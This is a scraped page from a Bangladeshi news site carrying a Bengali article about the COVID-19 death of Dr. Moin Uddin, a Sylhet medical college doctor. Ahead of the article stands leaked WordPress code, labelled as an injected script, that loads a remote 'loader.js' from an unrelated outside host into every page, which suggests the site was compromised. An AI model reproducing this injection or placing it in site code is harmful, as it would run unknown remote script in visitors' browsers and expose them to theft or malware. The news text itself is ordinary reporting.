// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site বাঁচানো গেল না সিলেটের করোনা যোদ্ধা ডঃ মঈনকে - Janabarta.com

বাঁচানো গেল না সিলেটের করোনা যোদ্ধা ডঃ মঈনকে

নিজস্ব প্রতিবেদক: নভেল করোনাভাইরাসে আক্রান্ত হয়ে মারা গেলেন সিলেট এম এ জি ওসমানী মেডিকেল কলেজ হাসপাতালের সহকারী অধ্যাপক ডা. মঈন উদ্দিন। আজ বুধবার সকালে ঢাকা কুর্মিটোলা জেনারেল হাসপাতালে চিকিৎসাধীন অবস্থায় তার মৃত্যু হয়। মৃত্যুকালে তার বয়স হয়েছিল ৫০ বছর।

গত ৫ এপ্রিল ডা. মঈন উদ্দিনের কভিড-১৯ পজিটিভ হওয়ার বিষয়টি নিশ্চিত করেন সিলেটের সিভিল সার্জন ডা. প্রেমানন্দ মন্ডল। ওইদিনই তাকে সিলেটের শহীদ শামসুদ্দিন হাসপাতালে ভর্তি করা হয়। অবস্থার অবনতি হলে ৮ এপ্রিল তাকে নিয়ে আসা হয় রাজধানী ঢাকা কুর্মিটোলা জেনারেল হাসপাতালে। ১৩ এপ্রিল থেকে তাকে লাইফ সাপোর্টে রাখা হয়েছিল। প্রায় ১ সপ্তাহ লড়াই করার পর মৃত্যুর সঙ্গে হেরে গেলেন এই চিকিৎসক।

ডা. মঈন উদ্দিন কভিড-১৯ আক্রান্ত হওয়ার পরপরই সিলেটের হাউজিং স্টেটে অবস্থিত তার বাসা লকডাউন করে দেয় প্রশাসন। একদিন পর পুরো হাউজিং এলাকাই লকডাউন করা হয়। তার সংস্পর্শে আসা ১৬ জন চিকিৎসককে ইতোমধ্যেই করোনা পরীক্ষা করা হয়েছে, তারা কেউ আক্রান্ত নন।

ওসমানী মেডিকেল কলেজের অধ্যাপনার পাশাপাশি তিনি প্রাইভেট প্র্যাকটিস করতেন সিলেট নগরের সুবহানিঘাট ইবনে সিনা হাসপাতালে। ধারণা করা হয়, সেখানেই কোনো প্রবাসীকে চিকিৎসা দিতে গিয়ে তিনি করোনায় আক্রান্ত হন।